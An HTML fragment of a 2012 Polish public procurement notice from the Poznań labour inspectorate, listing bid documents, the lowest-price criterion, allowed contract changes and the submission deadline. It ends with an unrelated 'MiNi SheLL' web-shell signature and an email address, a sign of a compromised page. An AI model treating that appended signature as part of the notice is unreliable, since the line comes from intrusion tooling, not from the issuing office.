<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, które nie stanowią potwierdzenia warunków udziału w postępowaniu.
Wykonawca oprócz dokumentów wskazanych wyżej zobowiązany jest załączyć do oferty:
1.	formularz ofertowy z wykorzystaniem wzoru- załącznik nr 2 do siwz,
2.	Oświadczenie o podwykonawcach zgodnie z art. 36 ust. 4 Pzp - załącznik nr 4 do siwz, 
3.	Informację o podmiocie wspólnym - załącznik nr 6  do siwz - jeżeli dotyczy,
4.	Kosztorys ofertowy - sporządzony według wzoru zawartego w załączniku nr 9, 9a oraz 9b do siwz - przedmiar robót - branża budowlana i elektryczna oraz sanitarna,
5.	Pełnomocnictwo do podpisania oferty - jeżeli dotyczy (należy załączyć w formie oryginału lub notarialnie poświadczonej kopii).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany w umowie w zakresie:
- terminu realizacji przedmiotu zamówienia, z przyczyn niezależnych od stron umowy, których nie można było przewidzieć w chwili jej zawarcia,
- zmiany materiałów w trakcie wykonywania robót na inne o takich samych lub lepszych parametrach niż zaoferowane w ofercie pod warunkiem niezmienności cen oraz pod warunkiem uzyskania pisemnej akceptacji Zamawiającego, w przypadku wycofania z produkcji materiałów wskazanych w dokumentacji.
- zmiany podwykonawcy/podwykonawców, jeżeli Wykonawca będzie korzystał z doświadczenia i wiedzy, o której mowa w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych innych podmiotów przy składaniu oferty - na zasadach określonych w art. 26 ust. 2b ustawy Prawo Zamówień Publicznych - zobowiązany jest w przypadku zmiany podwykonawców przedstawić dokumenty, potwierdzające, że nowy podwykonawca posiada co najmniej takie samo doświadczenie i wiedzę jak ten wskazany w ofercie na podstawie której oferta Wykonawcy została uznana za najkorzystniejszą. W takim przypadku Wykonawca zobowiązany jest dostarczyć do siedziby Zamawiającego na własny koszt dokumenty wskazane w § 2 rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form w jakich te dokumenty mogą być składane ( Dz. U. z 2009 r. Nr 228, poz. 1817) - odnoszące się do nowego podwykonawcy. Nie dostarczenie ww. dokumentów lub dokumentów nie potwierdzających, że nie zachodzą przesłanki wskazane w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych stanowiło będzie podstawę do odmowy zmiany podwykonawcy oraz do odstąpienia od umowy i naliczenia kary umownej, za odstąpienie od umowy z przyczyn zależnych od Wykonawcy w wysokości 10% wynagrodzenia umownego brutto .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poznan.oip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Inspekcja Pracy
Okręgowy Inspektorat Pracy w Poznaniu
ul. Św. Marcin 46/50
61-807 Poznań 
pokój 802 (VIII piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2012 godzina 10:00, miejsce: Państwowa Inspekcja Pracy
Okręgowy Inspektorat Pracy w Poznaniu
ul. Św. Marcin 46/50
61-807 Poznań 

w kancelarii zamawiającego pokój 910 (IX piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com